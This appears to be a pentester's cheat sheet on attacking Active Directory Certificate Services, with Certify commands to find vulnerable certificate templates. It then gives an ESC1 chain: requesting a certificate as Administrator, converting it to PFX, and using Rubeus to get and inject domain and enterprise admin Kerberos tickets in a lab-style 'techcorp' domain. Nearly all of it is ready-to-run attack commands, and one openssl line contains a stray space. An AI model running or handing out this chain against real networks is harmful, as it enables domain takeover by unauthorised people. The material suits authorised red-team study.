# ad-cs

## Methodology

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

## Certify

**Enumerate all Certificate Authorities (CA) in the domain:**

```batchfile
Certify.exe cas
```

**Enumerate templates:**

```batchfile
Certify.exe find
```

**Enumerate vulnerable templates:**

```batchfile
Certify.exe find /vulnerable
```

#### ESC1

**Enroll in template and copy private key to a file:**

```batchfile
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
```

**Change RSA to PFX:**

```batchfile
openssl.exe pkcs12 -in cert.pem - keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfx
```

**Request TGT with the PFX:**

```batchfile
# Request a TGT and inject it
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password /ptt

# Request a enterprise admin TGT and inject it
Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt
```